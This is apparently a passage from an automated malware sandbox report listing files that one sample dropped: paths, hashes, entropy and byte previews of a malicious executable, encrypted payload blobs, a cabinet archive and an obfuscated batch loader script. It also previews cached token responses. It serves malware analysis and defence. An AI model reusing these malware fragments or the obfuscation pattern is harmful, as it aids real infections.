                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2278
                                                                                                                                                                                                                                                                          Entropy (8bit):3.846618558094175
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:uiTrlKxrgxJsxl9Il8uF25W2aR8Bp2YPTFlh1Nzd1rc:mPYy5W2aR8LxlhPU
                                                                                                                                                                                                                                                                          MD5:C824917A91D447071D2DC53C58379209
                                                                                                                                                                                                                                                                          SHA1:E6BD558A526D283EC61B5799CEE68D1B25AB6546
                                                                                                                                                                                                                                                                          SHA-256:007DCB1B9922FB2B8C1B706BB44844D6631BA2A1E9D18C4DCB6CBCBED27A4B7E
                                                                                                                                                                                                                                                                          SHA-512:8423F766F38D592C42A916BE15A72F5E8D63BCA832FBB6C880F895599498ADF25CB8B2204EAA5E583864BF3A07B5C47A81C2CD2C510F82E6D23DEBCAB0CD32A0
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.4.x.g.C.5.Y.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.p.Y.q.C.o.l.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):4622
                                                                                                                                                                                                                                                                          Entropy (8bit):4.004929656303451
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:96:CYy50lrc6SGHqalSvHXRPPjmRjmhk1fxhd5:CUpkoSfRPKVzb75
                                                                                                                                                                                                                                                                          MD5:933F26F5A28A51ABC34C7275E3453DDD
                                                                                                                                                                                                                                                                          SHA1:C6A4245441BDF5C442C1D1A7A54194531A6EB65F
                                                                                                                                                                                                                                                                          SHA-256:43CF321C218F839EE6BEBA76E4DBC42FDB757E56EBCF70E306864D7C57668E53
                                                                                                                                                                                                                                                                          SHA-512:0BEF6B0A904C7112F5C6A717198E53BDF3947AAEDEC8153BC38B31FD05C9AF7B45EAC6DDAB0FD1F8DD3CF3E1061EBC89EE281B0494F134C9AA83CE6FA9E6471D
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".a.1.j.N.Z.S.Z.Y.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.p.Y.q.C.o.l.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2684
                                                                                                                                                                                                                                                                          Entropy (8bit):3.8960938029218872
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:uiTrlKx68Wa7xFxl9Il8uF25WLUV+G6Huygwzbknu9Bumj53dK8nYd/vc:aLYy5WLkbygGbku7Jj53dpB
                                                                                                                                                                                                                                                                          MD5:3E6374A42C99A3A4BACBCB241297453E
                                                                                                                                                                                                                                                                          SHA1:8F969ED201CF964FAFE1A10CF265ACE3EF234387
                                                                                                                                                                                                                                                                          SHA-256:B3452222DCAB706C08689C49AF177CFB5C7AB5EC836DBCF3C1E089C8B840CF72
                                                                                                                                                                                                                                                                          SHA-512:01AAE0EC60372735439774D36EFB8457B1469CEA6A2B23B3857E5866D5ACD71D44DE7DE4CD2A3EE7FCBA054EDCCB75594DA94A1098944673F36CA5F5816ACE35
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".x.s.W.F.l.v.d.2.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.p.Y.q.C.o.l.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                          Size (bytes):947288
                                                                                                                                                                                                                                                                          Entropy (8bit):6.630612696399572
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                                                                                                                                                                                          MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                                          SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                                                                                                                                                                                          SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                                                                                                                                                                                          SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                                                                                                                          • Filename: yoda.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: lem.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: script.ps1, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: installer_1.05_36.4.zip, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: Set-up.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: Set-up.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: PodcastsTries.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: vce exam simulator 2.2.1 crackk.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: LVDdWBGnVE.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: eMBO6wS1b5.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\m

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):271120
                                                                                                                                                                                                                                                                          Entropy (8bit):7.9993557269020155
                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                          SSDEEP:6144:Gc4RvoyV4vGzMoN0npS8nqWhvoSTK4mXomqX8Ih:YRvgoN01rh5K4gqX5h
                                                                                                                                                                                                                                                                          MD5:37042197E6ED0CED3E18E3049135E2E5
                                                                                                                                                                                                                                                                          SHA1:26B16A34CB5646551C53C2CD45209F4237B06BE2
                                                                                                                                                                                                                                                                          SHA-256:537914B1D5A23203831B93E943BFD9C74DC117AB8D84DE22D37CA7EA2F8F8288
                                                                                                                                                                                                                                                                          SHA-512:588185840D638A0C6F167FCFAFCC64DC831D9E5A2A0AB69D8C8B201C4B905CA5DA412D908C1A00B50453259FD5B9DAC63C4376E086B26180B51A066BB714D51D
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:b...W....Vg.....c..@...\B...7....$..Z.=....a5d.;.....`.k..4K...i..............-...A"....vHD....p+.won5c..t.i*W....'X.F..R..s.=........Dv;.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R....G.F.'.F...h..............X..<2...X..<2..kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..t.P..,P..Myn.2..t.W....$....D...F...X...g...X..<2..m.........8.5...x..2).U.j....r>.v".].w...)...hG..}.k..-...N.2...)<.G..G...c.'.t.&f/]._2..GR.._...?X.1}.O N......`2r...V.3.Y3.mr....3...Ns...?.j...k...]..?..Y.tP#.K..L............s..*l.Qq:.....Z.V.:.4.....Wer=...k.{%..&..#k,F...(.5..h..?7..... ..,H.m. ......4..~r>-..6.O......<cWk.3"....-k.c../.i../s.UYGzs!..Z.Z...........F..Dr.J...=[..0......[...= ...S...&\..o.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Authorization

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\putt.exe
                                                                                                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, 487443 bytes, 11 files, at 0x2c +A "Proceedings" +A "Recovery", ID 8198, number 1, 29 datablocks, 0x1 compression
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):487443
                                                                                                                                                                                                                                                                          Entropy (8bit):7.998124391538459
                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                          SSDEEP:12288:B+S9oU3XWMHVIx884xmjdmLlSM7DGRgpqb7ITX:AeoUnW1xbAlSM3BpqATX
                                                                                                                                                                                                                                                                          MD5:3E6C9EC6F7CFD6FF9E44415233734692
                                                                                                                                                                                                                                                                          SHA1:C9E302D20AADC02EEF66CCB7E0562C9D5AAD1FAE
                                                                                                                                                                                                                                                                          SHA-256:59F56DFCFF7617579EC1940D61BF2AF6EFA6DD90D0849F9B658FF56859A118B9
                                                                                                                                                                                                                                                                          SHA-512:4467EDF1AEE44166B6D7356E3A4C91AF1F38C6934F06EC6C63EA778E96190061F05759C9AC2366AA364A35AFDBE1ED6478AFAFAC7A62EA9BA3CC153AA2E35518
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:MSCF.....p......,................ ..6..................YN- .Proceedings..X.........YN- .Recovery..X...L.....YN- .Sunglasses............YN- .Division...........YN- .Cultural...........YN- .Tulsa...........YN- .Being...........YN- .Name...........YN- .Subtle.....[......YN- .Silicon.....[|.....YN- .Webster.....S..CK..T..8|7{......`.Q.....&.h..MP..Cv...*.q.O.v%VB.w.2...-*V.bl.}hK.JP...IP...FB5V.3qS..a...=..M.}.....x.s..33g.93.+Is.........W.I..)A.z..|I...........b..&.....a$.],IU5.p.....!.qLy.Rvf..b.+'b.-f.|T=.._0.8>....-F./....Pc$L].9~..+..k?..{0a.%.1. ...!.;...R....x..F..u..E..1g.9....9....9.s.j......6...8^ ..4.FI...`b<)E...b..I.e>.*.Q..`.'YD.%.m0!....RR.6h.'..*J.....qG.$.A./P.......~=..{...o..'HR.I...(K...-P...$..,.`..M..j.C...z..A.....)&u#.X .u....!...J....4I.V...^....P.......*..3...?.B[..G.d...Oa>.[ge...Kc......$..J..,X....|../...3....1.b.Z.\.k.H...q.......C..Y..-..:....K.Q..n...EM.3.....-.Y..m<...6.................!..S...J.a.}..%=G...L.n..P

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Being

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):68608
                                                                                                                                                                                                                                                                          Entropy (8bit):5.767683978790837
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:Ov2j62SfuVGHj1vtK7h6R8anHsWccd0vtmgMbFuz08Qukl6:+2jfTq8QLeAg0Fuz08X5
                                                                                                                                                                                                                                                                          MD5:D562AC74A5D84C5F5418FE566482E0A6
                                                                                                                                                                                                                                                                          SHA1:86694D56F1571999F19E56C3143680B49866DDE8
                                                                                                                                                                                                                                                                          SHA-256:CCBDCE2D5D2EE43E6B214CD363E32DFBE2B14A9100DE6A179BE7B3C6D4CDAF24
                                                                                                                                                                                                                                                                          SHA-512:1E3466B2C2D23741A0CD9DB3CC594D9529C8660AC05311708606EE9809F16D67AC2B072CF0E2D423FE02A6E867A13043400064D0860B63D0C3A0BC1E855DD62A
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:..I.[.I...I.U..QQSVW.U..0^L..M.3......;.u.R....(..Y..t..U..M....^L.G..F..u..._^[.....U..QQSVW..y........f..toj]...E.\...^.E.[......f;U.u...q.j]Xf;.t.j\Xf;u.u.j]...^.)f;U.u.f9y.t*j[X....j]^...f;.t.f;.u.f9q.t.........f..u.3._^[..3...@..U..SV.u...W.....N.;.r.j..u....u..X'.......t..6..u.3.@_^[].3...SV... ..W.N<.<.;.~...;.}Y..+...d|P..?P......Y..u.j..>.F<..P.v.S.K]...F ...+F....~<......C.F ~..v..T...Y.^.3..~<..jHX_^[..NL.....B..u.8.t.I.........L..U....SV....U.W.E.q.3..}.......................I..$..I..u.3.......u.f;.U..u......F.................jw.}._..F..4Ff9>t.}.....E..y...E...;.......jwYf;...........h....}....^....]...N.jw_.C...H....A...Af99t.}.;.v.;...9....M.....t.9P.t.....u..........E.M.PS.u..U..J..U....................}..P...jw_..F..4Ff9>t..9.....F.....1L...4N.........1L..4F....G....}...}.......f.F......f#......f;................F..........F.....F..}....t....uL....G...G.}....pu...F...j.X.4F.......br+..gv4..iv...lv*..mu...F.f;F.u....}.........G.....j...j........j

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Cohen

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\putt.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (944), with CRLF line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):25102
                                                                                                                                                                                                                                                                          Entropy (8bit):5.113247807478338
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:384:CLr7xw9jD6bo12DAZS4Mt0TuJuZ7kwsFZLfUwfZfLPX2to8rD6r:kXUjDt12s0BiuJuZIw0ZLffhfDK1r8
                                                                                                                                                                                                                                                                          MD5:15B3F5F2D363D4D3BC645E1261EE7E5B
                                                                                                                                                                                                                                                                          SHA1:AB35B1C8CB947A415C033AC8973137472C21F627
                                                                                                                                                                                                                                                                          SHA-256:FDED537E8EFA988E93A53FC946BA828AFCB4275A6AA1756ABCFD56F1B39A8C85
                                                                                                                                                                                                                                                                          SHA-512:5316C823881AD73C85F00A8C78398C485341488B36E4256C7E553AC06EDE4AA682C91AA5607D1AF5B7871C429B5519911C99D3AFE313EE5A93BF1648E814C998
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:Set Camp=9..QXipBelle-..AXEGoverning-Tex-Breed-Verification-Ethical-Doctors-..PIInvisible-..ahPMidlands-Brand-Keith-Promotion-Intervals-Orange-Chuck-..cyfJAccident-Creative-Luke-..dwWZRouter-Russell-Jill-Essays-Xhtml-Win-..mPWFoot-Assessments-Grant-..UyNChar-Marcus-Controller-Webcam-Johnson-Madrid-Pix-..Set Counseling=C..AFAutomation-Brighton-Ra-Pins-Illinois-Beside-Sharon-..ItTrouble-Interesting-Chips-Strap-Behaviour-Podcasts-Approx-..TDlChannels-Loose-Young-Lace-Weak-Parameters-..uVHZSmall-Rosa-Inner-..HxeSailing-Deviant-Hood-Conversations-Anytime-Comics-Congo-..YSChains-Subject-Lunch-Mint-Cartoon-Important-Nearest-..BJYQInvesting-Toddler-Allowing-..kCKeywords-..nPUSearches-..Set Focused=E..jOYValue-Easy-Tobacco-Desktop-Burlington-Ja-..TNpFailing-Daughter-..hiTested-Tribe-Females-Quote-Feature-Helpful-Butler-..hFNOperator-Detail-Tunisia-Tapes-Write-Election-Territory-Boob-Cooler-..KQteProbably-Maps-Graphical-Forgotten-..bIStrong-Oxygen-Ul-Novel-..OOSSThreshold-Camp-Tub-Dp-Influence-D

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Cohen.cmd (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (944), with CRLF line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):25102
                                                                                                                                                                                                                                                                          Entropy (8bit):5.113247807478338
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:384:CLr7xw9jD6bo12DAZS4Mt0TuJuZ7kwsFZLfUwfZfLPX2to8rD6r:kXUjDt12s0BiuJuZIw0ZLffhfDK1r8
                                                                                                                                                                                                                                                                          MD5:15B3F5F2D363D4D3BC645E1261EE7E5B
                                                                                                                                                                                                                                                                          SHA1:AB35B1C8CB947A415C033AC8973137472C21F627
                                                                                                                                                                                                                                                                          SHA-256:FDED537E8EFA988E93A53FC946BA828AFCB4275A6AA1756ABCFD56F1B39A8C85
                                                                                                                                                                                                                                                                          SHA-512:5316C823881AD73C85F00A8C78398C485341488B36E4256C7E553AC06EDE4AA682C91AA5607D1AF5B7871C429B5519911C99D3AFE313EE5A93BF1648E814C998
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:Set Camp=9..QXipBelle-..AXEGoverning-Tex-Breed-Verification-Ethical-Doctors-..PIInvisible-..ahPMidlands-Brand-Keith-Promotion-Intervals-Orange-Chuck-..cyfJAccident-Creative-Luke-..dwWZRouter-Russell-Jill-Essays-Xhtml-Win-..mPWFoot-Assessments-Grant-..UyNChar-Marcus-Controller-Webcam-Johnson-Madrid-Pix-..Set Counseling=C..AFAutomation-Brighton-Ra-Pins-Illinois-Beside-Sharon-..ItTrouble-Interesting-Chips-Strap-Behaviour-Podcasts-Approx-..TDlChannels-Loose-Young-Lace-Weak-Parameters-..uVHZSmall-Rosa-Inner-..HxeSailing-Deviant-Hood-Conversations-Anytime-Comics-Congo-..YSChains-Subject-Lunch-Mint-Cartoon-Important-Nearest-..BJYQInvesting-Toddler-Allowing-..kCKeywords-..nPUSearches-..Set Focused=E..jOYValue-Easy-Tobacco-Desktop-Burlington-Ja-..TNpFailing-Daughter-..hiTested-Tribe-Females-Quote-Feature-Helpful-Butler-..hFNOperator-Detail-Tunisia-Tapes-Write-Election-Territory-Boob-Cooler-..KQteProbably-Maps-Graphical-Forgotten-..bIStrong-Oxygen-Ul-Novel-..OOSSThreshold-Camp-Tub-Dp-Influence-D

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Cultural

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):71680
                                                                                                                                                                                                                                                                          Entropy (8bit):6.61321542810069
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:9iKwtk2ukC5HRu+OoQjz7nts/M26N7oKzYkBvRmLORuCYm9PrpmESA:FwS2u5hVOoQ7t8T6pUkBJR8CThpmESA
                                                                                                                                                                                                                                                                          MD5:21F9A0D1A89E387CD2274ABC7CE97FE8
                                                                                                                                                                                                                                                                          SHA1:0FD8A73629F4EAF6DA323F23F34D9CF3BD365F75
                                                                                                                                                                                                                                                                          SHA-256:F494D9FCC5ACD2AAF67C78F50DD42FF180563E7B5D644499C733702577E55331
                                                                                                                                                                                                                                                                          SHA-512:DF1162A9F13847AE11FC84D7BFB42914618D24778634E2396D5FE3AC7F26D299D183DF200F7C1594A24106BD1637BEE81F702B8BD590E617CA46A2F7C5E5132D
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:.......E..P.~...j.......f..u.j.......f..t..~..u.j..M......E..P.G...j.......f..u.j.......f..t..~..u.j..M..^....E..P.....j[......f..u.j[..f..t..~..u.j[.M..,....E..P....._[^....U......$.E.SVW..j.P.F .N...3.~...\$..\$.f.\$.u$Sj.........D$...D$.P.^...P.L$......j@.L$$........M.W.|......f........G..|$.........!......H...t|...tn..3t`...t.j.S...U..D$.P.D$$Pj}Y....YY..u.j.j{......3..F.f.F..|$$.t..D$ ..P.....|$.3..F.f.F..d....F...[....F...R....F...I....F...@....~..u..D$...P......t$...j......j..v ........L$ ...._^[..]...U....VW.}....~[S.M......u..4....]...t..E...P.8....F...P.v....E..P......E..P."......u...[t..F...P.*..._^....U.....E.SVW..j.P.F ....3.~...]..].f.].u!Sj...."....E...E.P....P.M..*......M.W......f..t...G.7...j.S.......3..F.f.F...~..u..E...P.....u...j.....j..v ......._^[....U...hS.M.3.V.M..M....M..M..M.W....3..M.G.}..6....M.......U..E.P.E.Pj X......YY....@....u.j _.M.V.....f98t..M.V....f.8.u.F...U..E.P.E.u.P3..h...h43L..u........j._..u.......

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Division

                                                                                                                                                                                                                                                                          Download File
